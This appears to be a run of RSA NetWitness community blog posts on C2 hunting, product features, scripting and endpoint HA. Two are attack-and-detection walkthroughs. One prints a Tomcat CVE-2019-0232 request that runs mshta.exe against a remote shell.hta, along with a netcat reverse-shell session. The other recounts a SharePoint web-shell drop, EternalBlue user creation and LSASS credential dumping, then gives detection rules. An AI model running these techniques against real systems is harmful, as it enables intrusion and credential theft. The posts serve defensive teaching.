  2. Secondly, you want to focus on a single protocol at a time. So for our hypothesis, we could start with SSL, if we have no findings, we can move on to another protocol such as HTTP. The idea is to navigate through them one by one to separate the data into smaller more manageable buckets without getting distracted (service = 80)
  3. Now we want to hone in on the characteristics of the protocol, and pull it apart. As we are looking for C2 communication, we would want to pull apart the protocol to look for more mechanical type behaviour - one meta key that helps with this is Service Analysis - the below figure shows some examples of meta values created based off HTTP


A great place to get more detail on using NetWitness for hunting can be found in the RSA NetWitness Hunting Guide: RSA NetWitness Hunting Guide PDF.


From the Investigation view, we can start with our initial query looking for outbound traffic over HTTP, and open the Service Analysis meta key. There are a fair number of meta values generated, and all of them are great places to start pivoting on, you can choose to pivot on an individual meta value, or multiple. We are going to start by pivoting on three, which are outlined below:

  • http six or less headers: Modern day browsers typically have seven or more headers. This could indicate a more mechanical type HTTP connection
  • http single response: Typical user browsing behaviour would result in multiple requests and responses in a single TCP connection. A single request and response can indicate more mechanical type behaviour
  • http post no get no referer: HTTP connections with no referer or GET requests can be indicative of machine like behaviour. Typically the user would have requested one or more pages prior to posting data to the server, and would have been referred from somewhere


After pivoting into the meta values above, we reduce the number of sessions to investigate to a more manageable volume:


Now we can start to open other meta keys and look for values of interest without being overwhelmed by the enormous amount of data. This could involve looking at meta keys such as Filename, Directory, File Type, Hostname Alias, TLDSLD, etc. Based off the meta values below, the domain de11-rs4[.]com stands out as interesting and something we should take a look at; as an analyst, you should investigate all domains you deem of interest:


Opening the Events view for these sessions, we can see a beacon pattern of ~10 minutes, the filename is the same everytime, and the payload size is consistent apart from the initial communication which could be a download of a second stage module to further entrench - this could also be legitimate traffic and software simply checking in for updates, sending some usage data, etc.:


Reconstructing the events, we can see the body of the POST contains what looks like Base64 encoded data, and in the response we see a 200 OK but with a 404 Not Found message and a hidden attribute which references cmd.exe and whoami:

The Base64 data in the POST is encrypted, so decoding it at this point would not reveal anything useful. We may, however, be able to obtain the key and encryption mechanism if we had the executable, keep reading on to see!


Similarly we see another session which is the same but the hidden attribute references tasklist.exe:

The following application rule logic would detect default Throwback C2 communication:
service = 80 && analysis.service = 'http six or less headers' && analysis.service = 'http post no get no referer' && filename = 'index.php' && directory = '/' && query begins 'pd='

This definitely stands out as C2 traffic and would warrant further investigation into the endpoint. This could involve directly analysing all network traffic for this machine, or switching over to NetWitness Endpoint to analyse what it is doing, or both.


NOTE: The network traffic as seen here would be post proxy, or traffic in a network with no explicit proxy settings (


Detection Using NetWitness Endpoint

As per usual, I start by opening the compromise keys. Under Behaviours of Compromise (BOC), there are multiple meta values of interest, but let's start with outbound from unsigned appdata directory:


Opening the Events view for this meta value, we can see that an executable named, dwmss.exe, is making a network connection to de11-rs4[.]com:


Coming back to the investigation view, we can run a query to see what other activity this executable is performing. To do this, we execute the following query, filename.src = 'dwmss.exe' - here we can see the executable is running reconaissance type commands:


From here we decide to download the executable directly from the machine itself and perform some analysis on it. In this case, we ran strings and analysed the output and saw there were a large number of references to API calls of interest:


There is also a string that references RC4, which is an encryption algorithm. This could be of potential interest to decrypt the Base64 text we saw in the network traffic:


RC4 requires a key, so while analysing the strings we should also look for potential candidates for said key. Not far from the RC4 string is something that looks like it could be what we are after:


Navigating back to the packets and copying some of the Base64 from one of the POST's, we can run it through the RC4 recipe on CyberChef with our proposed key; in the output we can see the data decoded successfully and contains information about the infected endpoint:


Now we have confirmed this is malware, we should go back and look at all the activity generated by this process. This could be any file that it has created, files dropped around the same time, folders it may be using, etc.



C2 frameworks are constantly being developed and improved upon, but as you can see from this C2 which is ~6 years old, their operation is fairly consistent with what we see today, and with the way NetWitness allows you to pull apart the characteristics of the protocol, they can easily be identified.

It is possible to add RSA NetWitness as a Search Engine in Chrome, which allows to run queries directly from the address bar.



The following are the steps to follow in your browser to set this up.


  1. Start by navigating to your NetWitness instance on the device you want to query (typically the broker). Note the highlighted number in the address (this number identifies the device to query and varies from environment to environment).
  2. Right click in the navigation bar and select "Edit search engines..."




  1. Click on "Add" to add a new search engine
  2. Add the information for your NetWitness instance
    • Search Engine: This can be any name of your choice. This is the name that will show in the address bar when selected
    • Keyword: This is the keyword that will be used to trigger NetWitness as the Search Engine to use (initiated by typing "keyword" followed by the <tab> key)
    • URL: this should be based on the following structure: https://<netwitness_ip>/investigation/<number from 1st step>/navigate/query/%s
  3. Click on "Add" to add NetWitness as a Search Engine



Now, whenever you click on the address bar, type nw followed by the <tab> key (or whatever keyword you have chosen in the previous step), you can directly type your NetWitness query in the address bar and hit <enter> to run the query on NetWitness.




We are excited to share that Dell Technologies (RSA) has been positioned as a “Leader” by Gartner in the 2020 Magic Quadrant for Security Information and Event Management research report for its RSA NetWitness® Platform – for the second year in a row!


The RSA NetWitness Platform pulls together SIEM, network detection and response, endpoint detection and response, UEBA and orchestration and automation capabilities into a single evolved SIEM. RSA’s continued investments in the platform position us as the go-to platform for security teams to rapidly detect and respond to threats across their entire environment.


The 2020 Gartner Magic Quadrant for SIEM evaluates 16 vendors on the basis of the completeness of their vision and ability to execute. The report provides an overview of each vendor’s SIEM offering, along with what Gartner sees as strengths and cautions for each vendor. The report also includes vendor selection tips, guidance on how to define requirements for SIEM deployments, and details on its rigorous inclusion, exclusion and evaluation criteria. 


Download the report and learn more about RSA NetWitness Platform.


Gartner, Magic Quadrant for Security Information and Event Management, Kelly Kavanagh, Toby Bussa, Gorka Sadowski, 18 February 2020

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.


As Leader in Magic Quadrant for Security Information and Event Management 2020

As Leader in Magic Quadrant for Security Information and Event Management 2018


GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and is used herein with permission. All rights reserved

The concept of multi-valued meta keys - those which can appear multiple times within single sessions - is not a new one, but has become more important and relevant in recent releases due to how other parts of the RSA NetWitness Platform handle them.


The most notable of these other parts is the Correlation Server service, previously known as the ESA service.  In order to enable complex, efficient, and accurate event correlation and alerting, it is necessary for us to tell the Correlation Server service exactly which meta keys it should expect to be multi-valued.


Every release notes PDF for each RSA NetWitness Platform version contains instructions for how to update or modify these keys to tune the platform to your organization's environment. But the question I have each time I read these instructions is this: How do I identify ALL the multi-valued keys in my RSA NetWitness Platform instance?


After all, my lab environment is a fraction the size of any organization's production environment, and if it's an impossible task for me to manually identify all, or even most, of the these keys then its downright laughable to expect any organization to even attempt to do the same.


Enter....automation and scripting to the rescue!

superhero entrance


The script attached to this blog attempts to meet that need.  I want to stress "attempts to" here for 2 reasons:

  1. Not every metakey identified by this script necessarily should be added to the Correlation Server's multi-valued configuration. This will depend on your environment and any tuning or customizations you've made to parsers, feeds, and/or app rules.
    1. For example, this script identified 'user.dst' in my environment.
    2. However, I don't want that key to be multi-valued, so I'm not going to add it.
    3. Which leaves me with the choice of leaving it as-is, or undoing the parser, feed, and/or app rule change I made that caused it to happen.
  2. In order to be as complete in our identification of multi-valued metas as we can, we need a large enough sample size of sessions and metas to be representative of most, if not all, of an organization's data.  And that means we need sample sizes in the hundreds-of-thousands to millions range.


But therein lies the rub.  Processing data at that scale requires us to first query the RSA NetWitness Platform databases for all that data, pull it back, and then process it....without flooding the RSA NetWitness Platform with thousands or millions of queries (after all, the analysts still need to do their responding and hunting), without consuming so many resources that the script freezes or crashes the system, and while still producing an accurate result...because otherwise what's the point?


I made a number of changes to the initial version of this script in order to limit its potential impact.  The result of these changes was that the script will process batches of sessions and their metas in chunks of 10000.  In my lab environment, my testing with this batch size resulted in roughly 60 seconds between each process iteration.


The overall workflow within the script is:

  1. Query the RSA NetWitness Platform for a time range and grab all the resulting sessionids.
  2. Query the RSA NetWitness Platform for 10000 sessions and all their metas at a time.
  3. Receive the results of the query.
  4. Process all the metas to identify those that are multi-valued.
  5. Store the result of #3 for later.
  6. Repeat steps 2-5 until all sessions within the time range have been process.
  7. Evaluate and deduplicate all the metas from #4/5 (our end result).


This is best middle ground I could find among the various factors.

  • A 10000 session batch size will still result in potentially hundreds or thousands of queries to your RSA NetWitness Platform environment
    • The actual time your RSA NetWitness Platform service (Broker or Concentrator) spends responding to each of these should be no more than ~10-15 seconds each.
  • The time required for the script to process each batch of results will end up spacing out each new batch request to about 60 seconds in between.
    • I saw this time drop to as low as 30 seconds during periods of minimal overall activity and utilization on my admin server.
  • The max memory I saw the script utilize in my lab never exceeded 2500MB.
  • The max CPU I saw the script utilize in my lab was 100% of a single CPU.
  • The absolute maximum number of sessions the script will ever process in a single run is 1,677,721. This is a hardcoded limit in the RSA NetWitness SDK API, and I'm not inclined to try and work around that.


The output of the script is formatted so you can copy/paste directly from the terminal into the Correlation Server's multi-valued configuration.  Now with all that out of the way, some usage screenshots:





Any comments, questions, concerns or issues with the script, please don't hesitate to comment or reach out.

What are LotL tactics?

Living-Off-The-Land tactics are those that involve the use of legitimate tools for malicious purposes. This is an old concept but a recent growing trend among threat actors because these types of techniques are very difficult to detect considering that the tools used are whitelisted most of the time. A good list of applications that can be used for these type of tactics can be found at LOLBAS (Windows) and GTFOBins (UNIX).



The first part of this article will show how an attacker is able to spot and exploit a recent RCE (Remote Code Execution) vulnerability for Apache Tomcat. We will see how the attacker will eventually be able to get a reverse shell using a legitimate Windows utility mshta.exe. The second part will focus on the detection phase leveraging the RSA NetWitness Platform.



The attacker has targeted an organization we will call examplecorp throughout this blog post. During the enumeration phase, thanks to resources such as Google dorks, and nmap, the attacker has discovered the company runs a Tomcat server which is exposed to the Internet. Upon further research, the attacker finds a vulnerability and successfully exploits it in order to obtain a reverse shell, which will serve as the foundation for his malicious campaign against examplecorp


To achieve what has been described in the above scenario the attacker uses different tools and services:


The scenario is simulated on a virtual local environment. Below is a list of the IP addresses used:

  •  --> attacker machine (Kali Linux)
  •    --> victim/examplecorp machine  (Windows host where Tomcat is running)
  •  --> remote server where the attacker stored the malicious payload (shell.hta)


Part 1 - Attack phase

With enumeration tools such as nmap, gobuster, etc., the attacker discovers that the Tomcat server is on version 9.0.17, it is running on Windows and it serves a legacy application through a CGI Servlet at the following address:


Hello World!

In our example the application will be as simple as "Hello, World!" but will be something else in reality.


Upon further research the attacker discovers a vulnerability (CVE-2019-0232) in the CGI Servlet component of Tomcat prior to version 9.0.18. A detailed description of the vulnerability can be found here at the following links:


With a simple test the attacker can verify the vulnerability. Just by adding ?&dir at the end of the URL the attacker can see the output of the dir command on the affected Windows server Tomcat is running on.

root@kali:~# curl ""
Hello, World!
Volume in drive C has no label.
Volume Serial Number is 4033-77BA

Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

19/12/2019  13:27    <DIR>          .
19/12/2019  13:27    <DIR>          ..
17/12/2019  15:00    <DIR>          %SystemDrive%
16/12/2019  21:37                67 app.bat
19/12/2019  13:19                21
               2 File(s)             88 bytes
               3 Dir(s)  39,850,405,888 bytes free


Now the attacker decides to create a malicious payload that will spawn a remote shell. To do that, he uses a tool dubbed WeirdHTA that allows to create an obfuscated remote shell in hta format that he can then invoke remotely using the Microsoft mshta utility. The attacker tests the file with the most common anti virus software to ensure is properly obfuscated and not detected before initiating the attack.



The attacker launches the below command to connect to the remote server and run the malicious payload:

root@kali:~# curl -v ""
*   Trying
* Connected to ( port 8080 (#0)
> GET /cgi/app.bat?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta HTTP/1.1
> Host:
> User-Agent: curl/7.66.0
> Accept: */*
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Content-Type: text/plain
< Content-Length: 15
< Date: Fri, 31 Jan 2020 10:44:16 GMT
Hello, World!
* Connection #0 to host left intact


If we break this command down we can see the following:

  1. curl -v "
      The above is the URL of the Tomcat server where the CGI Servlet app (app.bat) resides
  2. ?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+
      The second part is a URL-encoded string that decodes to C:\Windows\System32\mshta.exe
  3. http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta"
    This last part is the URL-encoded address of the remote location ( where the attacker keeps the malicious payload, that is shell.hta.


The attacker, who had created a listener on his remote server, obtains the shell:

root@kali:~# nc -lvnp 7777
listening on [any] 7777 ...
connect to [] from (UNKNOWN) [] 50057
Client Connected...

PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi> dir

    Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

Mode                LastWriteTime         Length Name                                                                 
----                -------------         ------ ----                                                                 
d-----       17/12/2019     15:00                %SystemDrive%                                                        
-a----       16/12/2019     21:37             67 app.bat                                                              
-a----       19/12/2019     13:19             21                                                             

PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi>


Part 2 - Detection phase with the RSA NetWitness Platform

While investigating with RSA NetWitness Endpoint the analyst notices the Behaviors of Compromise meta key populated with the value runs mshta with http argument, which is unusual.



Filtering by the runs mshta with http argument indicator, the analyst observes that an application running on Tomcat is launching mshta which in turn is calling an hta file residing on a remote server (



Drilling into these sessions using the event analysis panel, the analyst is able to confirm the events in more detail:

  1. app.bat ( running on machine with hostname winEP1 and IP
  2. created the process
  3. called mshta.exe
  4. mshta.exe runs with the parameter


The analyst, knowing the affected machine IP address, decides to dig deeper with the RSA NetWitness Platform using the network (i.e. packet) data.


  1. Investigating around the affected machine IP in the same time range, the analysts notices the IP address (attacker) connecting to Tomcat on port 8080 (to test whether the server is vulnerable to CVE-2019-0232) by adding the dir command to the URL. He can also see the response.

  2. Immediately after the first event, the analyst notices the same IP address connecting on the same port but this time using a more complex GET request which seems to allude to malicious behavior.

  3. Now the analysts filters by ip.dst= (the IP address found in the GET request above) and he is able to see the content of the shell.hta file. Although it is encoded and not human-readable it is extremely suspicious!

  4. Next, the analysts filters by ip.dst= and he eventually sees that the attacker has obtained shell access (through PowerShell) to the windows machine where Tomcat resides.



LotL tactics are very effective and difficult to detect due to the legitimate nature of the tools used to perform such attacks. Constant monitoring and proactive threat hunting are vital for any organization. The RSA NetWitness Platform provides analysts with the visibility needed to detect such activities, thus reducing the risk of being compromised.

In this post we will cover CVE-2019-0604 (, albeit a somehwhat older vulnerability, it is one that is still being exploited. This post will also go a little further than just the initial exploitation of the Sharepoint server, and use EternalBlue to create a user on a remote endpoint to allow lateral movement with PAExec; again, this is an old, well-known vulnerability, but something still being used. We will then utilise Dumpert to dump the memory of LSASS ( and obtain credentials, and then employ atexec from Impacket ( to further laterally move.


The Attack

The initial foothold on the network is obtained is via the Sharepoint vulnerability (CVE-2019-0604). We will use the PoC code developed by Voulnet ( to drop a web shell:


In the above command we are targetting the vulnerable Picker.aspx page, and using cmd to echo a Base64 encoded web shell to a file in C:\ProgramData\ - we then use certutil to Base64 decode the file into a publicly accessible directory on the Sharepoint server and name it, bitreview.aspx.


To access the web shell we just dropped onto the Sharepoint server, we are going to use the administrative tool, AntSword ( Here we add the URL to the web shell we dropped, and supply the associated password:


Now we can open a terminal and begin to execute commands on the server to get a lay of the land and find other endpoints to laterally move to:


The AntSword tool has a nice explorer view which allows us to easily upload additional tools to the server. In this instance we upload a scanner to check if an endpoint is vulnerable to EternalBlue:


Now we can iterate through some of the endpoints we uncovered earlier to see if any of them are vulerable to EternalBlue:


Now that we have uncovered a vulnerable endpoint, we can use this to create a user that will allow us to laterally move to it. Using the PoC code created by Worawit (, we can exploit the endpoint and execute custom shellcode of our choosing. For this I compiled some shellcode to create a local administrative user called, helpdesk. I uploaded my shellcode and EternalBlue exploit executable and ran it against the vulnerable machine:


Now we have created a local administrative user on the endpoint, we can laterally move to it using those credentials. In this instance, we upload PAExec, and Dumpert, so we can laterally move to the endpoint and dump the memory of LSASS. The following command copies the and executes the Outflank-Dumpert.exe using PAExec and the helpdesk user we created via EternalBlue:


This tool will locally dump the memory of LSASS to C:\Windows\Temp - so we will mount one of the administrative shares on the endpoint, and confirm if our dump was successful:


Using AntSwords explorer, we can easily navigate to the file and download it locally:


We can then use Mimikatz on the attackers' local machine to dump the credentials which may help us laterally move to other endpoints:


We decide to upload the atexec tool from Impacket to execute commands on the remote endpoint to see if there are other machines we can laterally move to. Using some reconaissance commands, we find an RDP session using the username we pulled from the LSASS dump:


From here, we could continue to laterally move, dump credentials, and further own the network.


Detection using NetWitness Network

NetWitness doesn't always have to be used for threat hunting, it can also be used to search for things you know about, or have been currently researching. Taking the Sharepoint RCE as an example, we can easily search using NetWitness to see if any exploits have taken place. Given that this is a well documented CVE, we can start our searching by looking for requests to picker.aspx (filename = 'picker.aspx'), which is the vulnerable page - from the below we can see two GET requests, and a POST for Picker.aspx (inbound requests directly to this page are uncommon):

Next we can reconstruct the events to see if there is any useful information we can ascertain. Looking into the HTTP POST, we can see the URI matches what we would expect for this vulnerability, we also see that the POST parameter, ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData, contains the hex encoded and serialized .Net XML payload. The payload parameter also starts with two underscores which will ensure the payload reaches the XML deserialization function as is documented:


Seeing this would already warrant investigation on the Sharepoint server, but lets use some Python so we can take the hex encoded payload and deserialize it to see what was executed:


From this, we have the exact command that was run on the Sharepoint server that dropped a web shell. This also means we now know the name of the web shell and where it is located, making the next steps of investigation easier:

As analysts, it sometimes pays to do these things to find additional breadcrumbs to pull from, although be careful, as this can be time consuming and other methods can make it a lot easier, like MFT analysis that is described later on in the blog post.


This means we could search for this filename in NetWitness to see if we have any hits (filename = 'bitreview.aspx'):


As you can see from the above highlighted indicators, even without knowing the name of the web shell we would have still uncovered it as NetWitness created numerous meta values surrounding its usage. A fairly recent addition to the Lua parsers available on RSA Live is, fingerprint_minidump.lua - this parser creates the meta value, minidump, under the Filetype meta key, and also creates the meta value, lsass minidump, under the Indicators of Compromise meta key. This parser is a fantastic addition as it tags LSASS memory dumps traversing the network, which is uncommon behaviour.


Reconstructing the events, we can see the web shell traffic which looks strikingly similar to China Chopper. The User-Agent is also a great indicator for this traffic, which is the name of the tool used to connect to the web shell:


We can Base64 decode the commands from the HTTP POST's and get an insight into what was being executed. The below shows the initial POST which returns the current path, operating system, and username:


The following shows a directory listing of C:\ProgramData\ being executed, which is where the initial Base64 encoded bitreview.aspx web shell was dropped:


We should continue to Base64 decode all of these commands to gain a better understanding of what the attacker did, but for this blog post I will focus on the important pieces of the traffic. Pivoting into the Events view for the meta value, hex encoded executable, we can see the magic bytes for an executable that have been hex encoded:


Extracting all the hex starting from 4D5A (MZ header in hexadecimal) and decoding it with CyberChef, we can clearly see this is an executable. From here, we could save this file and perform further analysis on it:


Continuing on with Base64 decoding the commands we come across something interesting, it is the usage of a tool called eternalblue_exploit7.exe against an endpoint in the same network. This gives the defender additional information surrounding other endpoints of interest to the attacker and endpoint to focus on:

If you only have packet visibility, you should always decode every command. This will help you as a defender better understand the attackers actions and uncover additional breadcrumbs. But if you have NetWitness Endpoint, it may be easier to see the commands there, as we will see later.


Knowing EternalBlue uses SMB, we can pivot on all SMB traffic from the Sharepoint server to the targetted endpoint. Opening the Enablers of Compromise meta key we can see two meta values indicating the use of SMBv1; this is required for EternalBlue to work. There is also an meta value of not implemented under the Error meta key this is fairly uncommon and can help detect potential EternalBlue exploitation:


Reconstructing the events for the SMBv1 traffic, we come across a session that contains a large sequence of NULLs, this is the beginning of the EternalBlue exploit and these NULLs essentially move the SMB server state to a point where the vulnerability exists:


With most intrusions, there is typically some form of lateral movement that takes place using SMB. As a defender we should iterate through all possible lateral movement techniques, but for this example I want to see if PAExec has been used. To do this I use the following query (service = 139 && filename = 'svcctl' && filename contains 'paexe'). From the below, we can see that there is indeed some PAExec activity. By default, PAExec also includes the hostname of where the activity occured from, so from the below filenames, we can tell that this activity came from SP2016, the Sharepoint server. We can also see that a file was transferred, as is indicated by the paexec_move0.dat meta value - this is the Outflank-Dumpert.exe tool:


Back in the Investigation view, under the Indicators of Compromise meta key, we see a meta value of lsass minidump. Pivoting on this value, we see the dumpert.dmp file in the temp\ directory for the endpoint that was accessed over the ADMIN$ share - this is our LSASS minidump created using the Outflank-Dumpert.exe tool:


Navigating back to view all the SMB traffic, and focusing on named pipes (service = 139 && analysis.service = 'named pipe'), we can see a named pipe being used called atsvc. This named pipe gives access to the AT-Scheduler Service on an endpoint and can be used to scheduled tasks remotely. We can also see some .tmp files being created in the temp\ directory on this endpoint with what look like randomly generated names, and window cli admin commands associated with one of them:


Reconstructing the events for this traffic, we can see the scheduled tasks being created. In the below screenshot, we can see the XML and the associated parameters passed, in this instance using CMD to run netstat looking for RDP connections and output the results to %windir%\Temp\rWLePJvp.tmp:


This is lateral movement behaviour via Impackets tool, atexec. It writes the output of the command to a file so it can read it and display back to the attacker - further analysing the payload, we can see the output that was read from the file and gain insight into what the attacker was after, and subsequently endpoints to investigate:



Detection using NetWitness Endpoint

As always with NetWitness Endpoint, I like to start my hunting by opening the three compromise keys (IOC, BOC, and EOC). In this case, I only had meta values under the Behaviours of Compromise meta key. I have highlighted a few I deem more interesting with regards to this blog, but you should really investigate all of them:


Let's start with the runs certutil with decode arguments meta value. Opening this in the Events view, we can see the parameter that was executed, which is a Base64 encoded value being echo'ed to the C:\ProgramData\ directory, and then certutil being used to decode it and push it to a directory on the server:


From here, we could download the MFT of the endpoint:


Locate the file that was decoded, download it locally, and see what the contents are:


From the contents of the file, we can see that this is a web shell:


We also observed the attacker initially drop a file in the C:\ProgramData\ directory, so this is also a directory of interest and somewhere we should browse to within the MFT - here we uncover the attackers tools which we could download and analyse:


Navigating back to the Investigate view and opening the meta value http daemon runs command prompt in the Events view, we can see the HTTP daemon, w3wp.exe, executing reconaissance commands on the Sharepoint server:

This is a classic indicator for a web shell, whereby we have a HTTP daemon spawning CMD to execute commands.


Further analysis of the commands executed by the attacker shows EternalBlue executables being run against an endpoint, after this, the attacker uses PAExec with a user called helpdesk to connect to the endpoint - implying that the EternalBlue exploit created a user called helpdesk that allowed them to laterally move (NOTE: we will see how the user creation via this exploit looks a little later on):


Navigating back to Investigate, and this time opening the Events view for creates local user account, we see lsass.exe running net.exe to create a user account called, helpdesk; this is the EternalBlue exploit. LSASS should never create a user, this is a high fidelity indicator of malicious activity:


Another common attacker action is to dump credentials. Due to the popularity of Mimikatz, attackers are looking for other methods of dumping credentials, this typically involves creating a memory dump of the LSASS process. We can therefore use the following query (action = 'openosprocess' && filename.dst='lsass.exe'), and open the Filename Source meta key to look for something opening LSASS that stands out as anomalous. Here we can see a suspect executable opening LSASS named, Outflank-Dumpert.exe:


As defenders, we should continue to triage all of the meta values observed. But for this blog post, I feel we have demonstrated NetWitness' ability to detect these threats.


Detection Rules

The following table lists some application rules you can deploy to help with identifying these tools and behaviours:





Packet Decoder

Requests of interest to Picker.aspx

service = 80 && action = ‘post’ && filename = 'picker.aspx' && directory contains '_layout'


Packet Decoder

AntSword tool usage

client begins 'antsword'


Packet Decoder

Possible Impacket atexec usage

service = 139 && analysis.service = 'named pipe' && filename = 'atsvc' && filename ends 'tmp'


Packet Decoder

Dumpert LSASS dump

fiilename = 'dumpert.dmp'


Packet Decoder

Possible EternalBlue exploit

service = 139 && error = 'not implemented' && eoc = 'smb v1 response'


Packet Decoder

PAExec activity

service = 139 && filename = 'svcctl' && filename contains 'paexe'



Endpoint Log Hybrid

Opens OS process LSASS

action = 'openosprocess' && filename.dst='lsass.exe'


Endpoint Log Hybrid

LSASS creates user

filename.src = ‘lsass.exe’ && filename’dst = ‘net.exe’ && param.dst contains’ /add’




Threat actors are consistently evolving and developing new attack methods, but they are also using tried and tested methods as well - there is no need for them to use a new exploit when a well-known one works just fine on an unpatched system. Defenders should not only be keeping up to date with the new, but also retroactively searching their data sets for the old.

Hi everyone!  In this video blog, I provide a demo of getting an 11.4 RSA NetWitness Platform full stack deployment within AWS. The demo deployment includes the following hosts:

  • NW Server
  • Network Hybrid
  • Health & Wellness Beta
  • Analyst UI


Please like or comment to let me know if this vblog was useful.



RSA NetWitness Platform - Product Manager

Visualization techniques can help an analyst make sense of a given data set by exposing scale, relationships, and features that would be almost impossible to derive by just looking at a list of individual data points.  As of RSA NetWitness Platform 11.4, we have added new physics and layout techniques to the nodal diagram in Respond in order to make better sense of the data both for when using Respond as an Incident/Case Management tool or when simply using Respond to group events and track non-case investigations (see Using Respond for Data Exploration for some ideas).




Clustering by Entity Type

Prior to 11.4, the nodal graph evenly distributed the nodes regardless of entity type (Host, IP, User, MAC, File). Improvements were made to introduce intelligent clustering such that entities of the same type not only retain their distinct color, but also have a higher chance of being clustered together.  This layout improvement makes it clearer to see relationships between different entity types, particularly when dealing with larger sets of data.


Variable Edge Forces Based on Relationship Type

Prior to 11.4, all edges between nodes were treated equally, resulting in lengths being rendered equally between all sets of connected nodes.  Improvements were made to adjust the relative attraction forces, helping to better distinguish attribute type relationships ("as", "is named", "belongs to", and "has file") from action type relationships ("calls", "communicates with", "uses").  Edges representing attributes will tend to be much shorter than those representing actions, which has the added benefit of reducing the number of overlapping edges, making relationships, scope, and sprawl much easier for an analyst to see at a glance.



Separation of Disconnected Clusters

Prior to 11.4, all nodes and edges were grouped into one large cluster, even if certain nodes in the data set did not have any relationship with others, requiring tedious manual dragging of nodes in order to distinguish the groupings.  Now, disjoint clusters of nodes are repelled from one another upon initial layout, making it extremely clear which sets of data are joined by some kind of relationship.  This is particularly helpful when using Respond for general data exploration of larger data sets (vs visualizing a single incident) that do not necessarily have commonality, both drawing the analysts eyes to potentially interesting outliers and once again reducing the number of overlapping edges that have historically made certain nodal graphs difficult to read, depending on the data set.

Improved Nodal Interaction

In addition to the physics governing new layouts, improvements have been made to nodal interaction to help take advantage of them.  Given the potential size and complexity of data sets, despite the introduction of layout and force techniques, the layout may not always be optimal.  The goal was to improve interaction by minimizing the number of graph drags needed by an analyst to make sense of even the most tangled data sets.  When dragged, nodes with high connectivity will generally attract other nodes with which a relationship exists.  Also, once any node is manually dragged into position, manipulating the position of other nodes will no longer impart a moving force, meaning the original dragged node will stay in place.  To "unpin" dragged nodes and have them spring back into place, simply double click.



As always, if you have any feedback or suggestions on how to make this experience even better, please leave a comment or, better yet, search, submit, and vote on product enhancements on the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform 


Happy Hunting!

Did you know that you can use Respond for data exploration, even if you aren't using it for Incident Management?  While the naming convention certainly does not suggest it, Respond can be just as useful outside of incident response a place for analysts to group events of interest during investigation and hunting efforts.    Using Respond as more of an analyst workspace can help teams collaborate better, track streams of thought, and take advantage of Respond's new and improved visualization capabilities as of 11.4 (see Visualization Enhancements in RSA NetWitness Platform 11.4  for details).  




Step 1 - Create an "Incident" from Events view

Once you have a set of data that carries significance, you can select any set or subset of events contained in a data set and use it to create a new "Incident".  For our purposes here, you'll have to look past the current naming conventions of Alerts and Incidents and just think of it as a grouping of events (log, endpoint, or network sessions).


What data sets to use is largely up to you, but this type of approach is particularly useful when following a methodology that requires systematically carving larger data sets into smaller, more manageable ones.  The example above is based on RSA's Network Hunting Guide, details of which can be found here: RSA NetWitness Hunting Guide 


Step 2 - Open in Respond

Once opened, all of the capabilities available when using Respond for Incident Management are available.  It doesn't mean you have to use all of them, but you may find some of them to be a handy way to tag in other analysis (Tasks) and keep track of your analysis (Journal).  And if you do happen to find something malicious in the data set, all of the relevant information is already contained.


In the example above, we're seeing if anything interesting shows up in the data set for "All outbound HTTP sessions using the POST method".  The nodal diagram can be a useful way to see how the data is distributed between entities (larger bubbles meaning a larger number of events), which sub data sets within the larger one are dealing with disjoint sets of entities (Files, Hosts, IPs, Users, MAC Addresses), and can key your eye towards groupings that lead to deeper levels of inspection.  


Step 3 - Use Respond Tools to Track, Pivot, and Collaborate

View Event Cards

In-line Event Reconstruction (eg. Network Reconstruction)

Entity Details - Pivot To Other Views 



Add New Events 

And don't forget that you can always add more events to the same Respond incident to expand investigation if more leads are uncovered. Simply start from the top, and "Add To Incident".


As always, if you have any feedback or suggestions on how to make this experience even better, please leave a comment or, better yet, search, submit, and vote on product enhancements on the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform 


Happy Hunting!

The newest version of the RSA NetWitness Platform is almost here!


We’re excited to release the 11.4 version of the RSA NetWitness Platform very soon. We’ve worked hard on many new features and enhancements that will help users detect, investigate, and understand threats in their organizations.


This version introduces new features in analyst investigation, UEBA, Respond, administrative functions, and RSA NetWitness Endpoint, that collectively make security teams more efficient and arm them with the most relevant and actionable security data. Some of the more noteworthy 11.4 features include:


  • Enhanced Investigation Capabilities: Fully integrated free-text search, auto-suggestion, & search profiles
  • Smarter Network Threat & Anomaly Detection: UEBA expanded to analyze packet data with 24 new indicators
  • Improved Visualization of Incidents: Respond visualizations are clearer with enhanced relationship mapping
  • Expanded Functions for Endpoint Response: Powerful Host forensic actions and dynamic analysis directly from the RSA NetWitness Platform
  • Simplified File Collection from Endpoint Agents
  • Single Sign-on Capability
  • Distributed Analyst User Interfaces
  • New Health and Wellness (BETA)

This is not an exhaustive list of all the changes, please see the Release Documentation for the nitty gritty of the release details and to understand the full list of all the changes we’ve made in this release.


In the coming days and weeks, we’ll be publishing additional blog entries that demonstrate how this new functionality operates, and the benefits customers can expect to realize in 11.4.


The RSA Product team is excited for you to try this new release!

HA is a common need in many enterprise architectures, so NetWitness Endpoint has some built-in capabilities that allow organizations to achieve a HA setup with fairly minimal configuration and implementation needs.


An overview of the setup:

  1. Install Primary and Alternate Endpoint Log Hybrids (ELH)
  2. Create a DNS CNAME record pointing to your Primary ELH
  3. Create Endpoint Policies with the CNAME record's alias value


The failover procedure:

  1. Change the CNAME record to point to the Alternate ELH


And the failback procedure:

  1. Change the CNAME record back to the Primary ELH


